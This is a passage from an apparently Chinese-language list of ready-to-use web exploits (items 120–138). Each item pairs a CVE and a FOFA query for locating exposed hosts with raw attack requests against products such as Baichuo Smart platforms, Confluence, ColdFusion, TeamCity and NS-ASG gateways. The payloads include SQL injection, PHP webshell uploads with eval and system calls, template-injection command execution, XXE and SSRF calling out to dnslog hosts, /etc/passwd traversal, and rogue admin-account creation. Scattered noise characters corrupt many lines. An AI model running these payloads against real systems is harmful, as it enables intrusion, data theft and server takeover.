9 A+ r7 z, {) p$ X, s3 `7 bSec-Fetch-Site: same-origin/ r+ o. n$ O+ f; _! C: z
X-Forwarded-For: 1.1.1.1/ u1 k" L7 M9 b) N* }6 h
X-Originating-Ip: 1.1.1.1- d# |; U& d& c( b R$ t7 R
X-Remote-Ip: 1.1.1.1! [, Q R& b) R* C: n
X-Remote-Addr: 1.1.1.11 K \; K4 r) c3 p: B- B
Te: trailers% T- C7 C6 D( A8 d3 t/ D
Connection: close
/ m* j9 l: e" D3 q0 \1 f4 J0 N# O1 | ], D# m' Q
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456, I& p& c0 Q3 |4 v. z! F5 I( Z
: B( G7 O1 M) n. X9 k' u
8 e: q6 n' W8 [
120. 北京百绰智能S40管理平台导入web.php任意文件上传' y- R& G1 b6 Q. J0 u) ]' L( H0 \3 v
CVE-2024-1253
, B W. r S N) B2 q- c7 GFOFA:title="Smart管理平台"' l5 z: X$ J5 P9 @5 o) Z
POST /useratte/web.php? HTTP/1.1
( o& M; P0 [% }- N, LHost: ip:port
( S; c; M. Q6 P0 QCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db: x* s0 O! E, Y. b" g
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
: P7 G8 G! o- lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( \; V( _9 v4 D5 b2 Q6 G. q9 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 ~7 e4 y# `2 z# j. t( q# } uAccept-Encoding: gzip, deflate5 w' m0 e( l* r: C" }9 g
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
5 s9 `! Q7 j+ H! ^3 f% mContent-Length: 597: I6 w0 \: U3 G/ ?+ C7 L2 V
Origin: https://ip:port1 C! s( \. [# I- O2 ?
Referer: https://ip:port/sysmanage/licence.php
5 l/ X9 A! Y2 D. ^/ b: K3 m0 xUpgrade-Insecure-Requests: 1
9 G3 R; M4 ~1 b- V; R) ?$ GSec-Fetch-Dest: document% W! U- [5 f, g7 B
Sec-Fetch-Mode: navigate
+ O7 z3 T' X& Q! B* ^Sec-Fetch-Site: same-origin
# i2 v+ _6 s' m# Z8 uSec-Fetch-User: ?1
: z. R: n) x5 X# `$ `4 GTe: trailers9 v% G# K6 z( X+ `3 X- c7 g
Connection: close: N$ H' I0 D2 S7 i: ~
3 y* M2 E H& X k1 N
-----------------------------42328904123665875270630079328
* o' |2 O! B c! H% eContent-Disposition: form-data; name="file_upload"; filename="2.php", Y& R' v5 I9 B; z4 ?9 L/ M
Content-Type: application/octet-stream
: X9 ~4 L; T- U; `1 U5 V# z @. `
0 k2 b) c. [4 @7 o<?php phpinfo()?>: m7 h6 \; o( d2 G9 t7 J0 c$ M
-----------------------------42328904123665875270630079328
& P# n( ^9 K( \, D( N5 p0 BContent-Disposition: form-data; name="id_type"
2 |. j8 }2 h$ a; x& Q5 A7 l! ^
" |2 j+ s" s% ?) z" V4 S1
- e, b; x) p* `' V- r7 E-----------------------------42328904123665875270630079328: a4 b; j5 z( A* k7 n0 g0 b# w
Content-Disposition: form-data; name="1_ck"6 x8 S" y" u% B' q. w; [+ R8 I4 u
# z' _/ Y) c; p4 c0 v1_radhttp
d6 c. n7 D& |' G' z, Q% V; b-----------------------------42328904123665875270630079328
. u9 _+ T6 ~( N3 i& hContent-Disposition: form-data; name="mode"
* F( s5 m" y q, h* K2 L3 J" v4 n7 ~" J$ c3 d
import3 k; P) _, U8 }, ~* V
-----------------------------42328904123665875270630079328
+ `' b) X5 K: j1 O; H3 s/ y; T* M; c( \
7 F, q4 Q2 t* |( M* {7 P" O- K- d
文件路径/upload/2.php
6 o; d9 j. f) N, I p* q' ?1 J5 r0 S- w; C
121. 北京百绰智能S42管理平台userattestation.php任意文件上传" m2 A7 [5 D! e7 @: I! \
CVE-2024-1918
9 _; g3 L" Q2 l# B/ z3 bFOFA:title="Smart管理平台"
( ^2 N; o( r) ]- v- `! d. _POST /useratte/userattestation.php HTTP/1.1
- X! @* ~! q5 @8 N3 w5 S2 T8 vHost: 192.168.40.130:8443/ d( H( g$ C# ?
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
K K9 n5 _5 X) P( ~+ V) |3 Z; B7 vUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko& V+ J; R: H& |3 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; t0 Y4 {* p( q0 y7 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 i! m1 q& x" t
Accept-Encoding: gzip, deflate K2 R6 x- X5 w2 W1 b
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793282 U9 ^0 G' {* Z! ], |
Content-Length: 592- y9 o# g, z* l. m
Origin: https://192.168.40.130:84431 S$ ^, \ n) u5 ~5 W! u
Upgrade-Insecure-Requests: 13 X5 K. s) R& _& ^1 j# T; W' b. L+ D
Sec-Fetch-Dest: document
! q0 s) Q; L* a9 i1 v; l7 u& [8 CSec-Fetch-Mode: navigate3 b$ O3 l; `8 O4 @3 W9 v# N
Sec-Fetch-Site: same-origin4 H/ v+ c6 ^, S# ^1 p/ s
Sec-Fetch-User: ?1, P/ c" Y. o* n) u
Te: trailers
: C5 r% \1 l; T7 A; ]- JConnection: close
6 \* r3 a6 \8 |; U0 V2 C7 O# H- k: z+ E/ v: c' H
-----------------------------42328904123665875270630079328
1 m1 \8 V$ Y4 I% Z/ G; RContent-Disposition: form-data; name="web_img"; filename="1.php"
- N% G3 i* U/ a, B, |0 S/ WContent-Type: application/octet-stream
. x j7 } g0 L% ^1 h
- Y+ O& ?0 _% ~7 Q4 K+ H9 _<?php phpinfo();?>
+ q% [1 Q4 T* x# G' ?1 ~' L( M-----------------------------42328904123665875270630079328! R; U5 i: T: ? L/ Y- r. D0 B
Content-Disposition: form-data; name="id_type"
& ^% H6 S# R3 `. j) W/ d- _3 h
- `. J, o8 A3 [/ D `( H1
( a3 g& P; U1 v+ F-----------------------------42328904123665875270630079328
" T" m& G7 u8 D3 J/ w1 b5 f. yContent-Disposition: form-data; name="1_ck"" H, L* m, R0 ?9 n$ W( X
/ ^5 p! X( Z% ^9 m3 E: b. y1_radhttp
5 Y, N- i/ h0 v( J# W-----------------------------42328904123665875270630079328
' v& Z% m7 v. a* R2 P6 J& EContent-Disposition: form-data; name="hidwel"
6 k [$ Z0 r% h7 y$ j3 j( U5 o% k
0 r( a, ?$ J$ ?' y+ @$ Iset0 x: a5 K% D) U
-----------------------------42328904123665875270630079328
6 v4 T! P4 N5 d% i* ~2 y2 y) w! Z* z! [3 Z) Q; ]2 n
( ]/ P, m+ _/ X; a% v0 X) t2 j- f+ Sboot/web/upload/weblogo/1.php% M: _4 r% p1 a% O$ E
- A* ~) I" Z. G' u# J& x
122. 北京百绰智能s200管理平台/importexport.php sql注入
- v% { z3 O1 v; m7 p% eCVE-2024-27718FOFA:title="Smart管理平台"
o7 C$ b& `% l% S, l其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()+ [8 f$ U9 C7 S* _8 s8 @" M3 S' o" C
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1- I$ N% S) E8 }- l0 x; h/ W, F
Host: x.x.x.x
# T! O* K& g+ ZCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
! Y* U2 v3 c; G' z9 ~$ Y; xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% v) n6 ^6 X+ s; ^. b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' W0 v& `9 b. r0 N% G# l+ o" T" K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" S( D) G* m% XAccept-Encoding: gzip, deflate, br
9 i! P) J9 ^: w! e% {/ g) R9 IUpgrade-Insecure-Requests: 10 V5 l: r$ F. b2 w" `7 T% m+ B/ H1 {
Sec-Fetch-Dest: document
B, m4 l( {7 {' U% L- PSec-Fetch-Mode: navigate
" s; Q, Y2 c1 M8 MSec-Fetch-Site: none3 W* B6 [. L& b6 v4 _9 q
Sec-Fetch-User: ?1& I% h1 a& m/ t
Te: trailers
/ e& J4 b/ B; U: M" _" v9 yConnection: close% R+ b% d# S' o K, l
q8 y/ H k: ^# U3 o
) e/ C# x' @# g |0 a. }5 ^, N" p
123. Atlassian Confluence 模板注入代码执行
# Y1 P" l( F1 j! C; OFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
+ u7 d3 F( }% M5 h- w* NPOST /template/aui/text-inline.vm HTTP/1.10 ~. | ^3 `0 X! n3 z, r
Host: localhost:8090) l0 f {9 c: r2 S+ B% c( }9 W
Accept-Encoding: gzip, deflate, br6 e* ~. i* b) k# `, V
Accept: */*3 U+ v/ H9 l! w/ E0 [1 s
Accept-Language: en-US;q=0.9,en;q=0.89 g! [8 T/ b2 u8 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36# C" T5 B2 ]$ C& T+ W5 X8 [
Connection: close# \) {: z! C/ S2 b* h
Content-Type: application/x-www-form-urlencoded
& }$ `# U b$ p5 j; j. G& g1 ^ h4 K5 Q& a- y* v
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))8 `5 a3 Y7 K& C
+ c, e/ L( ^6 k! P" u/ ~9 i
- ?2 ]9 [/ F2 d
124. 湖南建研工程质量检测系统任意文件上传
& @4 ~. y. O5 B) a8 JFOFA:body="/Content/Theme/Standard/webSite/login.css"
. P/ e. x8 T# w. ]POST /Scripts/admintool?type=updatefile HTTP/1.1
& _4 Y( _/ ^5 Y2 {$ J# A& DHost: 192.168.40.130:8282$ F) y* F2 L3 m4 L* v" n, _
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
8 f# P/ a2 e; `8 y4 \) N- R: [0 xContent-Length: 727 P% p# \* N; F" }" Y! _7 V4 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
) b& d# l, U7 h3 YAccept-Encoding: gzip, deflate, br
, J2 [3 P% Z& w) ?2 Y! e. f8 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 y n4 G" _: w# P0 GConnection: close
7 C. B$ P" A' C, N7 r! n8 nContent-Type: application/x-www-form-urlencoded5 y) O9 V, N$ ^+ D
+ [$ a9 c! M& H/ e
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>; S! k: {8 m- s( X" T
' F# N9 A# x& y# F2 R0 E. B3 m
) A4 i% f, U5 C# g3 J
http://192.168.40.130:8282/Scripts/abcgcg.aspx/ j' N) g E. z/ n% l$ M3 y
3 D- q" }0 L9 I
125. ConnectWise ScreenConnect身份验证绕过
- _# t) m+ ?/ V2 N5 e$ `0 RCVE-2024-1709
8 @ o J- y/ a8 a+ HFOFA:icon_hash="-82958153"3 c# s( P" ^: Q# A6 n
https://github.com/watchtowrlabs ... bypass-add-user-poc
O/ o0 J- [- d8 P" ^2 j7 ~0 R
8 _! }0 \# \' V5 t3 f9 \% p+ C
% i0 {* u% ?" Q: @使用方法
# a1 _! K; U( e, p' Qpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
( D$ |2 V5 p4 \; M. b v1 R
' D% L( h+ G$ p* b6 _ I# }# c) t0 R' l. N) ?
创建好用户后直接登录后台,可以执行系统命令。$ X0 u n y o! [ ^3 u
7 v f3 a, E+ {! v1 o( v126. Aiohttp 路径遍历
/ G# L: N3 Y [FOFA:title=="ComfyUI"
$ }: S3 o* J* a) ~; p/ lGET /static/../../../../../etc/passwd HTTP/1.1" g, A2 v% P! v; c
Host: x.x.x.x9 @+ ]% X, t! ~# L, T" E7 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
! w4 G& i" j& X) R- oConnection: close2 ~' O% X% e( i: c) N
Accept: */*1 ]; _/ s! E2 x* Z! q+ J* o$ Y2 y
Accept-Language: en" O7 n# h1 G& c) n+ }' M
Accept-Encoding: gzip- |" m! a# d H( @+ d8 K) B% r
) w B% L# N) d$ h: {
" r3 F4 |4 m0 T: q: y6 ^127. 广联达Linkworks DataExchange.ashx XXE$ X+ B$ ?! M; m G( R2 L/ c( K
FOFA:body="Services/Identification/login.ashx"
$ y. @( C5 ?! c" Q5 b; TPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
9 Z- h- g& x" k$ m! CHost: 192.168.40.130:8888) h: L9 {$ E5 @+ q' E7 `6 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.368 H3 U% d; p% J% M! {0 y9 x* r
Content-Length: 4158 ?* P! o( V9 ]7 ^: H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 ?4 c( ?& @7 v$ I* s+ f, l& IAccept-Encoding: gzip, deflate }6 _% ]) G: ?2 I' b4 q+ \ x6 _
Accept-Language: zh-CN,zh;q=0.97 |" L. @8 F8 Z; c- F
Connection: close
( r5 w& t" v" o* G3 HContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe02 ?8 J4 g. P5 J/ ?5 h* S9 e
Purpose: prefetch
4 U* J2 ^ w4 ]' r; k3 T* |. ^Sec-Purpose: prefetch;prerender
6 |0 |6 e6 s* M1 q2 |' I' ]
# G3 a6 h4 z! V1 n6 `+ j------WebKitFormBoundaryJGgV5l5ta05yAIe0/ X3 b9 q3 o: s0 ^6 s9 P7 V
Content-Disposition: form-data;name="SystemName"; q4 }; a2 w: Q& J4 s/ F
7 j7 ?. W1 j! ^7 t2 M2 q' Q, y
BIM8 i6 D1 X) J4 S# N
------WebKitFormBoundaryJGgV5l5ta05yAIe0
B, G6 U( z- ~9 fContent-Disposition: form-data;name="Params"2 d" l) Q$ C# ?, g
Content-Type: text/plain; L. p* Q. S, S: v% _; O1 L
' R) o: i3 q6 C5 f<?xml version="1.0" encoding="UTF-8"?>! b! U# t! e5 _ X
<!DOCTYPE test [% @/ {3 G3 d5 B" v* N* W p5 o
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">; C. Y) G; v: I: O5 Z; C% ?' B
]( \, Y4 {( i& Z
>7 P" O! H. U1 j) H- {
<test>&t;</test>
6 U9 r; J# a! T2 {! x' E: O( s9 s------WebKitFormBoundaryJGgV5l5ta05yAIe0--
* ?( E6 D' s3 B- @* ]( G G# z' \, K. T' L( Q l h" S, u# k1 Z
. \9 _1 R; C- b) o6 K
4 ?3 T3 Z8 G: m5 g& Q% Y$ ^. o
128. Adobe ColdFusion 反序列化. s6 G8 \. ?# d/ L4 i( H# u4 A
CVE-2023-38203
+ P( _3 ?2 t# S+ @9 V2 A3 r' QAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)5 \# e9 l0 `' g2 g
FOFA:app="Adobe-ColdFusion"
7 H6 R' E: c. l. ^' p) F2 |! \4 RPAYLOAD
0 s5 i. N- g& [' J4 Z, _
4 e r: F1 b6 H; e' S129. Adobe ColdFusion 任意文件读取; r3 {' `1 |9 M2 n+ s" h
CVE-2024-20767( _+ L2 v2 {- G3 Z+ Y7 |- ^1 u% T
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
! N. L6 a& D4 g$ q9 W- R第一步,获取uuid1 f9 ]7 s7 \$ _$ c
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
) d" t" t2 h; s3 {# y7 aHost: x.x.x.x
& J6 V+ j' l; l) CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36% ], \! \/ ^, ^1 Z* z
Accept: */*
( ?; F! a8 {* T" |# M+ h/ K- \Accept-Encoding: gzip, deflate. k3 Q% ^7 r: _" q8 D- e3 q9 p% g
Connection: close
! o! i. a4 B8 u. c
: U C6 D6 H2 H! Q6 i
+ D: ~8 L4 v& U# b第二步,读取/etc/passwd文件+ ]2 J2 M! a$ v
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
% I0 D) t, Z: p2 a' bHost: x.x.x.x e, n) J, D3 I+ e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) f. W9 Y& A5 q2 O. P3 @* AAccept: */*
& e4 i3 m- L$ P5 |Accept-Encoding: gzip, deflate
2 B7 c" C. {# WConnection: close' \* P2 g- F8 d; s* }. }
uuid: 85f60018-a654-4410-a783-f81cbd5000b91 ^( B2 b& {6 a
& S; q6 D. p( ?; P, H; s0 \4 ^2 }; C& U5 y+ X
130. Laykefu客服系统任意文件上传5 @/ G4 m4 _: Z
FOFA:icon_hash="-334624619"
2 z! J& G# B ?) ?8 JPOST /admin/users/upavatar.html HTTP/1.1
2 [3 B7 c6 ]/ K/ ~, n9 i5 FHost: 127.0.0.1
3 u7 ^: D$ G1 M. _$ D- E" TAccept: application/json, text/javascript, */*; q=0.015 }4 \' C# r3 w
X-Requested-With: XMLHttpRequest
7 e! M+ x) y4 }- G5 K5 B& t/ IUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.261 s- ?- w0 c6 L2 C) ] N& a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR3 U; q+ c) ~1 t8 X) \( _
Accept-Encoding: gzip, deflate
3 F. V2 D) w" G' z/ O _+ mAccept-Language: zh-CN,zh;q=0.91 p6 t; h2 r- F* c. T: e2 o G
Cookie: user_name=1; user_id=3
" R5 j( P; l6 Q4 X2 G2 [# d5 b* o5 |Connection: close5 X- C' z9 K3 J" Y! _ v3 u
- \9 o2 k& b, k. @------WebKitFormBoundary3OCVBiwBVsNuB2kR
3 x) K" y/ Y+ U0 P/ SContent-Disposition: form-data; name="file"; filename="1.php"# g* p/ `) b J b1 C
Content-Type: image/png4 v1 [& b Q! O" [, R6 u: q
5 F4 g; ^; x" C/ S) y( h6 r
<?php phpinfo();@eval($_POST['sec']);?>) C: w; v* D! ~6 P
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
1 m9 p" D! V; `$ |" k- [; y' G) N4 s% v# |% V
- U# Q3 f0 V4 p2 V3 ]
131. Mini-Tmall <=20231017 SQL注入4 D' q0 K3 Z/ P# c' S G8 N# X8 b/ I
FOFA:icon_hash="-2087517259"3 y6 X3 C1 [$ p6 [7 b0 t
后台地址:http://localhost:8080/tmall/admin
[6 A2 [' a- e& [" jhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)0 O2 i$ f) f8 ?% b8 G
/ b' U" W; Q* Q) t
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
) A d# V& y! ^) q* U: JCVE-2024-27198' K C# M, \& i- U
FOFA:body="Log in to TeamCity"
. a3 M% y2 ^; W; x7 w: {POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1. }6 ^4 V( N! c
Host: 192.168.40.130:8111
6 s! {9 V" ~( D! W# A0 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 k/ q7 c# u, A! k% @# G- Z8 aAccept: */*: d( r7 y- B I" _( B. A& u+ X+ H; S
Content-Type: application/json0 ]4 S( O2 T* h) K/ u6 E
Accept-Encoding: gzip, deflate
% [5 l2 b3 g7 r
! L* p5 ?, k# e# o{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}+ t Z0 H9 s" y7 _. k% `( [4 K
; G/ L7 W( v) ~+ O
4 r" z& N3 n C" P! M7 l- c3 dCVE-2024-27199
; W9 I( ]) v$ x0 c* ] T3 p" U/res/../admin/diagnostic.jsp
3 i0 c% Z8 a: v: t/.well-known/acme-challenge/../../admin/diagnostic.jsp
0 P/ w. q: [8 R, x1 I; }7 h1 t/update/../admin/diagnostic.jsp( y; m# L: E% p, k0 t
- ?2 ] [/ f: B, p" [, V
4 n- W$ W7 e0 R% n. ?" ^CVE-2024-27198-RCE.py4 N% d5 r3 Q- `, y4 D) S S+ X6 u
% ^7 m8 e9 l' l. s
133. H5 云商城 file.php 文件上传- L: L0 _1 N3 V. v
FOFA:body="/public/qbsp.php"
2 Q+ x) v/ V) X$ p: j XPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1. v7 W# b, z7 V
Host: your-ip" A' p: z8 U3 |) Q' L: Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
$ b& b: U* F* D5 T% L, TContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx( X/ l7 @3 V* y# n
! D# i+ ^! n; b: ~& g3 T" v8 I------WebKitFormBoundaryFQqYtrIWb8iBxUCx _( J$ u1 d! F7 a
Content-Disposition: form-data; name="file"; filename="rce.php"
\ M- x E/ d8 U& P3 l% n' u1 [Content-Type: application/octet-stream( S* Y' `1 O* m+ D5 @" G
1 d% `- S# I: O8 N% k
<?php system("cat /etc/passwd");unlink(__FILE__);?>5 {+ L7 t( p6 _! G% c% a
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--2 x' p0 G$ T. D5 B( {: t. Y$ G3 }9 D9 K
- y8 ]( s; D( C8 l6 Q5 r) Y- Q$ T5 U+ I7 X, [
' m' G2 f! W+ k' F& F) x
134. 网康NS-ASG应用安全网关index.php sql注入
( w* S% e" R/ ~1 z' k6 Y9 W6 FCVE-2024-2330
D9 E5 J1 }4 X8 {, i' P3 bNetentsec NS-ASG Application Security Gateway 6.3版本 \" d' h+ s" Z" [4 ^( ^
FOFA:app="网康科技-NS-ASG安全网关"
1 S! ^1 E3 g' ?( \) RPOST /protocol/index.php HTTP/1.17 {1 q# m& K. p+ b r4 T! [
Host: x.x.x.x
( Z) j) P) ^8 w% _! {8 zCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
2 w' h* D3 x2 a3 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0& ^- P5 b* G9 F+ A6 L
Accept: */*
7 x* }% @9 G6 r3 @" F. YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" v/ j; v' B5 R: U% hAccept-Encoding: gzip, deflate$ _, _/ f. P) \
Sec-Fetch-Dest: empty6 o: E+ W1 ~* t: }$ T) Z- }5 v
Sec-Fetch-Mode: cors. [/ Y6 V' N% m5 K% C
Sec-Fetch-Site: same-origin$ W. t2 n: X% i( T+ \8 q
Te: trailers4 x C) M/ ~2 w4 z! D3 t% Y
Connection: close5 ]4 L" _/ o/ d5 _# h& l- m
Content-Type: application/x-www-form-urlencoded, l7 \/ ^! W' y# z$ f
Content-Length: 263
7 P! U( F ~/ | ?/ X3 l3 N2 p, ^4 v+ l2 u4 n+ r4 T9 i
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}2 L, O( k* n2 K
0 C4 Y& G) q7 O1 q0 |8 {9 f
( l2 D& O* t1 s, C+ n/ W5 ~135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
1 V0 i: j/ y. q4 LCVE-2024-2022* H* |( p# R Z) E5 C
Netentsec NS-ASG Application Security Gateway 6.3版本
6 I; C- @! W/ S4 ?3 oFOFA:app="网康科技-NS-ASG安全网关"# g' f( |9 C& j
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1* ~) q& V. z" {
Host: x.x.x.x
7 `9 s1 J9 U* G" f9 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ o% t! o, d* d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ } a4 a) n& m2 [Accept-Encoding: gzip, deflate
# i/ I. h1 g6 [Accept-Language: zh-CN,zh;q=0.9
4 M- e" X0 S4 G' PConnection: close& n6 \+ x$ _$ z, i3 ?9 _
' Y# j$ H+ O8 a* N8 u/ S/ Z6 w( |2 Y
136. NextChat cors SSRF% R, p1 E+ A- }3 a" ]3 a
CVE-2023-49785
+ Z- l3 K# G$ F$ @FOFA:title="NextChat"% I1 z0 a* |( R
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
: ]0 s/ p1 c I1 m9 }. jHost: x.x.x.x:10000
# {. Z. B9 E8 NUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% j4 F& I ~" B( l6 |4 I
Connection: close
& J Z3 s# J- l9 U4 IAccept: */*7 a( }5 ?" @- c- S; p' f- Q+ N9 v
Accept-Language: en% h0 D% v3 y8 O0 u% }
Accept-Encoding: gzip( f) P" D( g' T: i
+ @ F- R) j" L: i/ o: d2 \4 G! K; I/ }8 f; U, B6 A H
137. 福建科立迅通信指挥调度平台down_file.php sql注入
# B ^! s0 E q/ |& a( t$ cCVE-2024-2620% f! D" t, H7 u0 l ^, V1 Z
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"( a; m! @$ g) B
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1% \$ m3 T9 R1 t/ [8 Z
Host: x.x.x.x
3 o; t6 ?1 A+ D P) E2 M6 n5 |( fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% Z/ e0 U% y- E( N- r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
P; t0 x: r0 U% L' K; W2 l* vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, {9 Z$ j4 {8 O; C, v
Accept-Encoding: gzip, deflate, br4 @" F; `9 z7 I8 T; U3 N) u) _
Connection: close7 a- j4 r' `. D+ l6 L
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj' G0 R% b1 s( i) c
Upgrade-Insecure-Requests: 1
! N& i0 l4 q0 x; B
& }# q! X4 h. ~( c H, R
, C# z1 R/ [) U, t! j138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
) W5 Y" s+ v$ j1 GCVE-2024-2621. F4 }. o, Q8 P. ], x+ C4 R
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
& O8 u% I" S$ I$ r( r% l0 qGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.15 u% `9 R% U: M3 Z" l9 g( ^: I
Host: x.x.x.x
# ^2 t& i& N) X* x1 p* {; NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 s5 ]4 r% r9 E# x' K' i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 Z2 L' E7 V+ b' Q" S3 W/ NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 i/ y: v8 D6 g, tAccept-Encoding: gzip, deflate, br
& P/ U$ @ o( }" N) x) K2 TConnection: close
9 j! c+ d# S' h6 S4 M5 o5 [Upgrade-Insecure-Requests: 1
